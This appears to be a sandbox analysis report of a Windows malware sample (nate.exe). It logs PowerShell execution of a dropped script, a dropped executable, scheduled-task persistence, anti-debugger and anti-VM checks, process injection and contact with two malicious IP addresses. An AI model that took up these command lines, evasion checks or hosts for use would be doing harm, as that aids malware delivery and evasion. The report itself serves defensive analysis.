file	C:\Users\test22\AppData\Local\Temp\1000055041\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000055041\do.ps1"
cmdline	Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000055041\do.ps1"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 22, 2024, 3:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe	1	1	0
ShellExecuteExW Sept. 22, 2024, 3:09 p.m.	show_type: 0 filepath_r: Powershell.exe parameters: -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000055041\do.ps1" filepath: Powershell.exe	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x0002dc00', u'virtual_address': u'0x00001000', u'entropy': 7.979343027686494, u'name': u' \\x00 ', u'virtual_size': u'0x00068000'}

entropy

7.97934302769

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001a2400', u'virtual_address': u'0x0031a000', u'entropy': 7.952889390862199, u'name': u'lyxnysfk', u'virtual_size': u'0x001a3000'}

entropy

7.95288939086

description

A section with a high entropy has been found

entropy

0.993842034806

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 22, 2024, 3:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 22, 2024, 3:03 p.m.	status_code: 0xc0000005 process_identifier: 2540 process_handle: 0x00000000000000bc		0	0
NtTerminateProcess Sept. 22, 2024, 3:03 p.m.	status_code: 0xc0000005 process_identifier: 2540 process_handle: 0x00000000000000bc	1	0	0

Communicates with host for which no DNS query was performed (2 events)

host	185.215.113.103
host	31.41.244.10

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 358 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 22, 2024, 3:09 p.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (1 event)

file	C:\Windows\Tasks\svoutse.job

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
parent_process	powershell.exe	martian_process	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1036,15000551865728333828,668222851403569902,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=824 /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef3f36e00,0x7fef3f36e10,0x7fef3f36e20

Resumed a suspended thread in a remote process potentially indicative of process injection (24 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2596 resumed a thread in remote process 2540
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0
NtResumeThread Sept. 22, 2024, 3:02 p.m.	thread_handle: 0x0000000000000114 suspend_count: 2 process_identifier: 2540	1	0	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 e9 28 46 00 00 89 cd 59 exception.symbol: nate+0x202682 exception.instruction: in eax, dx exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2107010 exception.address: 0x1192682 registers.esp: 4194072 registers.edi: 8269542 registers.eax: 1447909480 registers.ebp: 4006785044 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 18420183 registers.ecx: 20	1	0	0

nate.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All